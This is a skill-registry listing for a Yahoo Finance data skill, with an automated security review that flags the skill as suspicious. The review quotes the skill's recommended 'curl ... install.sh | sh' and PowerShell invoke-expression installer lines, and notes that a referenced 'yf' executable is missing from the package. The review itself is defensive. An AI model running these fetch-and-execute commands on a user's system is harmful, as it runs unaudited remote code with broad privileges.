Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Yahoo Finance
v1.0.0Get stock prices, quotes, fundamentals, earnings, options, dividends, and analyst ratings using Yahoo Finance. Uses yfinance library - no API key required.
⭐ 41· 16.8k·162 current·171 all-time
by@ajanraj
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The stated purpose (fetching Yahoo Finance data via yfinance) matches the libraries referenced (yfinance, rich). However the SKILL.md expects a local executable 'yf' under /path/to/skills/yahoo-finance/ which is not present in the package manifest (no code files). Requiring the 'uv' package manager is heavier than necessary for a simple yfinance script and is not justified by the description.
Instruction Scope
Instructions tell the user to run remote installation commands (curl https://astral.sh/uv/install.sh | sh or powershell invoke-expression), chmod and symlink a 'yf' binary into /usr/local/bin, and restart shells. Those steps grant the installer broad discretion (download-and-execute) and modify system paths. The skill's docs also assume files that are not bundled, which is a functional/integrity mismatch.
Install Mechanism
There is no formal install spec in registry metadata, but SKILL.md recommends installing 'uv' via a remote install script (curl | sh) from astral.sh. Download-and-execute from an external URL is a high-risk install pattern unless you inspect the script beforehand. The docs also suggest multiple install methods (curl installer, homebrew, pip) which is inconsistent but not necessarily malicious.
Credentials
The skill declares no required environment variables, credentials, or config paths and the instructions do not request secrets. That is proportionate to the stated purpose.
Persistence & Privilege
The skill does not request 'always: true' and is user-invocable only. However the suggested install steps (symlinking /usr/local/bin/yf) modify system-wide PATH and require filesystem privileges — this is expected for a CLI but worth noting because it makes the system-wide impact larger if the installed components are untrusted.
What to consider before installing
Things to consider before installing:
- The skill package contains no executable or script named 'yf' yet the README instructs you to chmod and symlink one. Ask the publisher to provide the 'yf' script or include code in the package.
- The SKILL.md recommends installing 'uv' by piping a remote install script (curl https://astral.sh/uv/install.sh | sh). Download-and-execute of remote scripts can run arbitrary code on your machine — do not run it without inspecting the script and trusting the host.
- Safer alternatives: create a Python virtualenv and pip install yfinance and rich yourself (pip install yfinance rich), then implement or review any wrapper script locally. Prefer installing from well-known package channels (pip, homebrew) rather than unknown remote installers.
- If you must use the provided installer, inspect the install script content first (curl -sL https://astral.sh/uv/install.sh and read it), avoid running as root, and avoid symlinking unknown binaries into system-wide locations until you audit them.
- Request clarification from the skill author about why 'uv' is required, and ask them to bundle the 'yf' script or provide an explicit, auditable install artifact. If the author can't provide code or the install script's contents, treat this package as untrusted.Like a lobster shell, security has layers — review code before you run it.
latestvk97cjmzj7czqcdb5t3jrj7gdsn7ysw83
License
MIT-0
Free to use, modify, and redistribute. No attribution required.